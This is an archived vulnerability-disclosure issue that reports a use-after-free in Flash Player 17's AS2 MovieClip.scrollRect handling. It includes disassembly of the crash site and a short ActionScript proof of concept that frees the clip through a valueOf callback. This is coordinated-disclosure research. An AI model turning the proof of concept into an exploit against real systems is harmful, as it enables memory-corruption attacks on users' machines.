search

AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Flash UAF with MovieClip.scrollRect in AS2 #359

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
[Deadline tracking for 
https://code.google.com/p/chromium/issues/detail?id=482521]

---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom 
Rectangle it is possible to free the MovieClip while a reference remains 
in the stack

VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]

REPRODUCTION CASE
That code targets the MovieClip.scrollRect property. While setting this 
attribute with a custom Rectangle, it is possible to trigger a use after free 
by freeing the targeted MovieClip. Creating a TextField with the same depth of 
the targeted MovieClip is enough to free an object and have Flash crash.

These lines come from flashplayer standalone 17.0.0.169:

.text:00597F45 loc_597F45:
.text:00597F45                 cmp     eax, 6
.text:00597F48                 jnz     loc_597FE5
.text:00597F4E                 mov     ecx, esi           ; esi points to the 
MovieClip object
.text:00597F50                 call    sub_40C1ED
.text:00597F55                 add     eax, 30Ch
.text:00597F5A                 or      dword ptr [eax], 8
.text:00597F5D                 mov     eax, [ebx]
.text:00597F5F                 mov     byte ptr [eax+82Ch], 1
.text:00597F66                 mov     ecx, [ebx]
.text:00597F68                 lea     eax, [ebp+74h+var_1C0]
.text:00597F6E                 push    eax
.text:00597F6F                 push    dword ptr [ebx+0Ch]
.text:00597F72                 call    xfetchRectangleProperties  ; get the 
Rectangle properties, and execute some AS2
.text:00597F77                 test    al, al
.text:00597F79                 jz      loc_598274
.text:00597F7F                 mov     edi, [ebp+74h+var_1C0]
.text:00597F85                 mov     ecx, esi
.text:00597F87                 imul    edi, 14h
.text:00597F8A                 call    sub_40C1ED          ; reference freed 
memory and return a bad 

pointer
.text:00597F8F                 mov     [eax+310h], edi     ; crash here, eax = 0

Poc (compile with Flash CS5.5):

import flash.geom.Rectangle
var o2 = {}
o2.valueOf = function () {
    _global.mc.createTextField("newtf",1,1,1,2,3)
    return 7
}
var o = {x:o2,y:0,width:4,height:5}

_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
newmc.scrollRect = o

---

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by cev...@google.com on 1 May 2015 at 10:11

Attachments:

GoogleCodeExporter commented 8 years ago 
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

Original comment by cev...@google.com on 1 May 2015 at 10:13

GoogleCodeExporter commented 8 years ago

Original comment by cev...@google.com on 5 May 2015 at 8:06

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:51

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 18 Aug 2015 at 7:17